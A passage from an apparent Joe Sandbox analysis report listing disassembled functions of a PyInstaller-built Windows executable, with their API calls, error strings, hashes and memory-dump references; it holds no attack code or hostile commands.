                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                  • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                  • Opcode ID: bdb51f189eec0aae26590c8a1b92bbb562030306dab734aaada4990c27a5542a
                                                                                                                                                                                                                                  • Instruction ID: f313f5aa19bce955fab23999e56595ac6e7fc054a09b00b6304cdae7fab1f308
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdb51f189eec0aae26590c8a1b92bbb562030306dab734aaada4990c27a5542a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD41B521B0865381EA12FB129C016B9F396FFA4BE4FE44931EE0C07785DE3CE5458B60
                                                                                                                                                                                                                                  Function 00007FF72C651470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                  • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                  • Opcode ID: a8e221c47165c0dbec1a7dc4007f346f16716469ebf4d834264a8452580f1fe3
                                                                                                                                                                                                                                  • Instruction ID: 3c93293992452c50435354a42f86e2d4df4e9d2704875170620fcf1a7f9a3b6e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8e221c47165c0dbec1a7dc4007f346f16716469ebf4d834264a8452580f1fe3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A418161A0854385EA02EB21DC411B9F392FFA47E4FE44932EE4D07B99DE3CE5458F64
                                                                                                                                                                                                                                  Function 00007FF72C65EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                                                                                  • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                  • Instruction ID: cf1b7d9260b1dd337f322538d9dc9c3f42fb4c4a0a2055fb6799c411062e17d4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05D18232A0878186EB21AB65D9803ADB7A2FB657E8F600135DF4D57795DF3CE081CB11
                                                                                                                                                                                                                                  Function 00007FF72C652C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF72C653706,?,00007FF72C653804), ref: 00007FF72C652C9E
                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF72C653706,?,00007FF72C653804), ref: 00007FF72C652D63
                                                                                                                                                                                                                                  • MessageBoxW.USER32 ref: 00007FF72C652D99
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                  • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                  • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                  • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                  • Instruction ID: e5da6b28d70f97c550be33878bb7928a7a18930d417b19fe976bc6fb89343c7f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0731F622708A4142E721BB25AC142ABA792FF987E8F900136EF4D93759DF3CD50ACB10
                                                                                                                                                                                                                                  Function 00007FF72C65DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DD4D
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DD5B
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DD85
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DDF3
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DDFF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                  • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                  • Instruction ID: 6ae0cf5baa093417a20021ca0618aaefd6792ed2195cb2806e943f1291da9b45
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE317221B1A64291EE13BB069D006A5A3D5FF68BF4FE94635DE1D463C0EE3CE4448B24
                                                                                                                                                                                                                                  Function 00007FF72C656360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                  • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                  • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                  • Instruction ID: 796ce303beb9b4be6c1e9479fbbaca77649ece06acdcfdde21d698eb5fda0e84
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7417421B18A8691EA12FB10EC152E9A313FF643A4FE04132EB5D47695DF3CE519CB60
                                                                                                                                                                                                                                  Function 00007FF72C652A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF72C65351A,?,00000000,00007FF72C653F23), ref: 00007FF72C652AA0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                  • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                  • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                  • Instruction ID: d4c003c454b633111998e97adf63469324c152fbf723e2234dec0d1069d84301
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7921A132A18B8292E722AB50BC417E6B3A5FB983D4F900136EE8D43659DF3CD149CA50
                                                                                                                                                                                                                                  Function 00007FF72C66B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                  • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                  • Instruction ID: 22c0e5db78f66657727efbb6fbc4989aea53d76814ed5388e91f011f0e5ee254
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC219024B0C24381F95A73619E51239F163FFA47B0FA04738E87E066C6DE2DA4405F21
                                                                                                                                                                                                                                  Function 00007FF72C677D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                  • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                  • Instruction ID: c1cab2659841ab4b17ec5aefbb1dc03c87c7df249e3fecf0500bc6ca7902e583
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D119631B18A4286E751AB52FC55339A3A1FBA8BF4F400734DA5D877A4DF3CD4588B50
                                                                                                                                                                                                                                  Function 00007FF72C658ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C658EFD
                                                                                                                                                                                                                                  • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C658F5A
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C659390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72C6545F4,00000000,00007FF72C651985), ref: 00007FF72C6593C9
                                                                                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C658FE5
                                                                                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C659044
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C659055
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C65906A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3462794448-0
                                                                                                                                                                                                                                  • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                  • Instruction ID: 45aa486cb43e8da2c99fb29abee3855fa73dab5e373ef8af8e499d9eca07cd38
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B341D662A1968281EA31AB11AC003BAB396FF99BE4F940539DF4D57789DF3DD501CF20
                                                                                                                                                                                                                                  Function 00007FF72C66B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B2D7
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B30D
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B33A
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B34B
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B35C
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF72C664F11,?,?,?,?,00007FF72C66A48A,?,?,?,?,00007FF72C66718F), ref: 00007FF72C66B377
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                  • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                  • Instruction ID: b528dea49729ec2de321f3305e8fcd7e978b44b48f469b021a3813d14ec907ea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16118E24B0C243C2FA5A73215E5113DB163FFA47B0FA44738EA6E576D6DE2CA4415B21
                                                                                                                                                                                                                                  Function 00007FF72C652910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF72C651B6A), ref: 00007FF72C65295E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                  • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                  • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                  • Instruction ID: 1a293b21af12d5c7a05d2a9e3fd064be512ebb6b8f574076b13183a5b28a55a4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F131F662B1868152E721B761AC412E7A396FF987E4F900136EF8D83749EF3CD14ACA10
                                                                                                                                                                                                                                  Function 00007FF72C652390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
